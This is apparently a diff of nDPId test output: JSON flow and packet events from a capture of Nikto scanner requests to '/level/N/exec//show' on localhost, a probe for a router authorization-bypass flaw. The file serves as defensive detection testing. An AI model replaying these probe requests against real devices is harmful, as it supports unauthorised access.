+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":575,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":575,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277598,"flow_last_seen":1576420277598,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277598,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50712,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/27\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001274)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":576,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":576,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277600,"flow_last_seen":1576420277600,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277600,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50714,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":576,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":576,"flow_packet_id":1,"flow_last_seen":1576420277600,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277600,"pkt":"AAAAAAAAAAAAAAAACABFAADIQiNAAEAG+gp\/AAABfwAAAcYaH5DTCnrawy0BcYAYAED+vAAAAQEICp1m\/oidZv6IR0VUIC9sZXZlbC8yOC9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjc1KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":576,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":576,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277600,"flow_last_seen":1576420277600,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277600,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50714,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/28\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001275)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":576,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":576,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277600,"flow_last_seen":1576420277600,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277600,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50714,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/28\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001275)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":577,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":577,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277602,"flow_last_seen":1576420277602,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277602,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50716,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":577,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":577,"flow_packet_id":1,"flow_last_seen":1576420277602,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277602,"pkt":"AAAAAAAAAAAAAAAACABFAADIalZAAEAG0dd\/AAABfwAAAcYcH5BVA1KtKWKiFYAYAED+vAAAAQEICp1m\/oqdZv6JR0VUIC9sZXZlbC8yOS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjc2KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":577,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":577,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277602,"flow_last_seen":1576420277602,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277602,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50716,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/29\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001276)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":577,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":577,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277602,"flow_last_seen":1576420277602,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277602,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50716,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/29\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001276)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":578,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":578,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277604,"flow_last_seen":1576420277604,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277604,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50718,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":578,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":578,"flow_packet_id":1,"flow_last_seen":1576420277604,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277604,"pkt":"AAAAAAAAAAAAAAAACABFAADIeUZAAEAGwud\/AAABfwAAAcYeH5Dj\/UG+lxmHS4AYAED+vAAAAQEICp1m\/oudZv6LR0VUIC9sZXZlbC8zMC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNzcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":578,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":578,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277604,"flow_last_seen":1576420277604,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277604,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50718,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/30\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001277)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":578,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":578,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277604,"flow_last_seen":1576420277604,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277604,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50718,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/30\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001277)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":579,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":579,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277607,"flow_last_seen":1576420277607,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277607,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50720,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":579,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":579,"flow_packet_id":1,"flow_last_seen":1576420277607,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277607,"pkt":"AAAAAAAAAAAAAAAACABFAADISctAAEAG8mJ\/AAABfwAAAcYgH5D3W3ExGI1+2IAYAED+vAAAAQEICp1m\/o6dZv6OR0VUIC9sZXZlbC8zMS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNzgpDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":579,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":579,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277607,"flow_last_seen":1576420277607,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277607,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50720,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/31\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001278)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":579,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":579,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277607,"flow_last_seen":1576420277607,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277607,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50720,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/31\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001278)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":580,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":580,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277608,"flow_last_seen":1576420277608,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277608,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50722,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":580,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":580,"flow_packet_id":1,"flow_last_seen":1576420277608,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277608,"pkt":"AAAAAAAAAAAAAAAACABFAADIARxAAEAGOxJ\/AAABfwAAAcYiH5DcsTnhkT\/ypIAYAED+vAAAAQEICp1m\/pCdZv6QR0VUIC9sZXZlbC8zMi9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjc5KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":580,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":580,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277608,"flow_last_seen":1576420277608,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277608,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50722,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/32\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001279)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":580,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":580,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277608,"flow_last_seen":1576420277608,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277608,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50722,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/32\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001279)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":581,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":581,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277609,"flow_last_seen":1576420277609,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277609,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50724,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":581,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":581,"flow_packet_id":1,"flow_last_seen":1576420277609,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277609,"pkt":"AAAAAAAAAAAAAAAACABFAADIVW1AAEAG5sB\/AAABfwAAAcYkH5Dpym2S0+8SfoAYAED+vAAAAQEICp1m\/pGdZv6RR0VUIC9sZXZlbC8zMy9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjgwKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":581,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":581,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277609,"flow_last_seen":1576420277609,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277609,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50724,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/33\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001280)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":581,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":581,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277609,"flow_last_seen":1576420277609,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277609,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50724,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/33\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001280)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":582,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":582,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277611,"flow_last_seen":1576420277611,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277611,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50726,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":582,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":582,"flow_packet_id":1,"flow_last_seen":1576420277611,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277611,"pkt":"AAAAAAAAAAAAAAAACABFAADIEPFAAEAGKz1\/AAABfwAAAcYmH5CKoygWHO02yYAYAED+vAAAAQEICp1m\/pOdZv6TR0VUIC9sZXZlbC8zNC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyODEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":582,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":582,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277611,"flow_last_seen":1576420277611,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277611,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50726,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/34\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001281)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":582,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":582,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277611,"flow_last_seen":1576420277611,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277611,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50726,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/34\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001281)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":583,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":583,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277612,"flow_last_seen":1576420277612,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277612,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50728,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":583,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":583,"flow_packet_id":1,"flow_last_seen":1576420277612,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277612,"pkt":"AAAAAAAAAAAAAAAACABFAADILGdAAEAGD8d\/AAABfwAAAcYoH5DpvhSfS8jZeYAYAED+vAAAAQEICp1m\/pSdZv6UR0VUIC9sZXZlbC8zNS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyODIpDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":583,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":583,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277612,"flow_last_seen":1576420277612,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277612,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50728,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/35\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001282)"}}
